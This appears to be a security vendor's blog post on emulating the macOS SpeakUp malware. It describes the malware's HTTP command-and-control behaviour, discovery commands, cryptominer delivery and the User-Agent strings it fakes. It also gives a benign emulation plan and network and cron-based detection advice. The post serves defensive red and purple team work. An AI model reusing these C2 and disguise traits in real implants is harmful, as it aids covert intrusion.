This #ThreatThursday we are releasing our first macOS threat to the SCYTHE Community Threats GitHub. As more and more customers migrate to Apple products, we want to provide adversary emulation plans that work against macOS as well. SCYTHE has the ability to create campaigns for Windows, Linux, and macOS. This post will look at emulating a macOS threat known as SpeakUp.
Cyber Threat Intelligence
SpeakUp is documented and mapped to MITRE ATT&CK in its own software page. SpeakUp has a Linux and a macOS variant and we will focus on emulating the macOS variant. The main reference to this threat actor comes from research at CheckPoint.
SpeakUp uses POST and GET requests over HTTP to talk to its command and control server, and does some interesting things with the User Agent as well as with POST requests. The initial POST packet will send a victim ID so that it can register the victim on the C2 server. Once registered, the implant will look to pull more information on the victim through the use of common discovery commands such as “uname -a” and “ifconfig -a”. The implant also has a fixed “knock” interval that it uses to communicate with the C2 server for new commands.
As for the User Agent, SpeakUp uses three specific User-Agents for communication with its C2 server. Two of the User Agents are MacOSX while the third is a hashed string of the word liteHTTP
- Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD
- Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
One of SpeakUp’s main features is its ability to serve another payload post-infection. We have seen SpeakUp serve XMRig miners to its infected servers to mine Monero coins. It should be able to just as easily serve another type of miner or something even more destructive.
Adversary Emulation Plan
To emulate SpeakUp, we’ll first use SCYTHE’s default heartbeat since SpeakUp has a fixed knock interval when communicating with the C2 Server. We’ll also use one of the two MacOSX User-Agents for this MacOS campaign.
Here is an adversary emulation profile for SpeakUp. The emulation plan can be downloaded from the SCYTHE Community Threats Github and imported to your SCYTHE instance.
To set the User Agent, it is as simple and adding parameters for the Communication Modules:
As mentioned in the Cyber Threat Intelligence portion, SpeakUp looks to register the victim information onto the C2 server through the use of a number of discovery commands.
Since SpeakUp is also able to serve an additional payload, we will be using the downloader module to grab a benevolent file, save it as a shell script, then cat it as a proof of concept. This will allow us to stay non-destructive with our emulation.
Defend against SpeakUp
The primary tool in the defending against SpeakUp comes from a common source: the network traffic. As of the reporting, we can see that SpeakUp reliably uses specific user agents, and heartbeat intervals for its C2. For example, in SpeakUp’s HTTP traffic, a network monitor would reliable see the strings: “Mobile/BADDAD”, “Mobile/7B405” and “E9BC3BD76216AFA560BFB5ACAF5731A3”, together these create some very clear IOC to look at from the network layer.
As for the behaviors and progoation, defense can be found by monitoring and logging of accounts for strange or unexpected behavior. The ability to detect when users (and especially root) are performing commands without your intent is critical in catching threats such as SpeakUp early. Finally, the regular auditing of cron is critical, as this is SpeakUp’s primary mechanism for persistence.
In this #ThreatThursday, we looked at our first macOS community threat. We started by consuming Cyber Threat Intelligence about SpeakUp and learning about the macOS malware variant. We created an adversary emulation plan using the same User-Agent and C2 profile as SpeakUp, shared it in our Community Threats Github, and showed how to emulate it yourself. Lastly, we covered how to defend against macOS threats. We hope you enjoyed it!
This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.
SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email firstname.lastname@example.org, visit https://scythe.io, or follow on Twitter @scythe_io.